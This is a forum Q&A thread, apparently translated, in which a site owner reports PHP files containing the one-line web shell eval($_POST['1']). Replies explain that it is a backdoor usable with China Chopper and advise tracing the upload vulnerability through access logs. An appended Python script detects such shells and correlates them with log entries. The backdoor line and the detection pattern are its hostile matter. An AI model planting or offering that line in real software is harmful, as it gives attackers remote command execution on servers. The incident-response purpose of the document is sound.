The website has several more PHP files with the following content: eval($_POST['1']);
Some of the other content. I tried Baidu and found that some commands were executed. I tested it. If the permissions are not limited, some commands can be executed. In addition to setting permissions, can I restrict permissions at the code level? Is there any good way?
There is also a PHP file with the following content:
There is a file named 13686921256303. virus_killed.
Content:
Thank you for your attention.
Reply content:
Apparently, a trojan was uploaded! You can use the "kitchen knife" client (China Chopper) to connect directly and execute many commands. To fix the vulnerability, check whether the website has problems such as upload vulnerabilities and SQL injection. You can view the HTTP access log to see what operations were performed using this one-line backdoor, and check whether privileges were escalated on the website and server permissions were obtained.
The fix must be made at the root.
Rather than worrying about making the virus code "not run", it is better to find the source of the virus's access: the vulnerability of the PHP programs or the insecure server environment.
In addition, using a VM may not be a good idea in terms of security. Because you share an isolated physical device with others and the LAMP environment, although theoretically there is good isolation between users in Linux, it is highly risky to choose not to isolate them.
This is a php backdoor.
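One way to carry out the advice in the replies above (find every planted file, then look in the HTTP access log for who called it), as an added example that is not code from the thread. It assumes the Apache/nginx combined log format; the function names, sample paths, addresses and log lines are constructed for illustration.

```python
import re
import tempfile
from pathlib import Path

# eval()/assert() applied directly to request input; tolerant of stray spaces.
SHELL_RE = re.compile(
    r"\b(?:eval|assert)\s*\(\s*\$\s*_\s*(?:POST|GET|REQUEST|COOKIE)\b", re.I)
# Combined Log Format: ip ident user [time] "METHOD target PROTO" status ...
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+)[^"]*" (\d{3})')

def find_suspect_files(webroot):
    """Web paths (relative to webroot) of PHP files matching SHELL_RE."""
    root = Path(webroot)
    return sorted("/" + p.relative_to(root).as_posix()
                  for p in root.rglob("*.php")
                  if SHELL_RE.search(p.read_text(errors="replace")))

def requests_to(paths, log_lines):
    """(ip, time, method, target, status) for every request to a flagged path."""
    wanted, hits = set(paths), []
    for line in log_lines:
        m = LOG_RE.match(line)
        if m and m.group(4).split("?", 1)[0] in wanted:
            ip, when, method, target, status = m.groups()
            hits.append((ip, when, method, target, int(status)))
    return hits

# Constructed sample data, not taken from the affected site.
SAMPLE_LOG = [
    '203.0.113.7 - - [10/May/2013:10:01:02 +0800] "POST /upload/a.php HTTP/1.1" 200 12',
    '198.51.100.9 - - [10/May/2013:10:02:00 +0800] "GET /index.php HTTP/1.1" 200 5120',
    '203.0.113.7 - - [10/May/2013:10:03:40 +0800] "POST /upload/a.php?x=1 HTTP/1.1" 200 48',
]

def demo():
    """Build a throwaway web root, scan it, and correlate with SAMPLE_LOG."""
    with tempfile.TemporaryDirectory() as d:
        root = Path(d)
        (root / "upload").mkdir()
        (root / "upload" / "a.php").write_text("<?php @eval ($_POST['1']); ?>")
        (root / "index.php").write_text("<?php echo htmlspecialchars($_POST['q']); ?>")
        suspects = find_suspect_files(root)
        return suspects, requests_to(suspects, SAMPLE_LOG)

if __name__ == "__main__":
    suspects, hits = demo()
    print("suspect files:", suspects)
    for h in hits:
        print(*h)
```

Access logs in this format do not record POST bodies, so the result shows which addresses called the file and when, not the commands that were sent. The earliest request to a flagged path is a useful starting point for finding the upload that planted it.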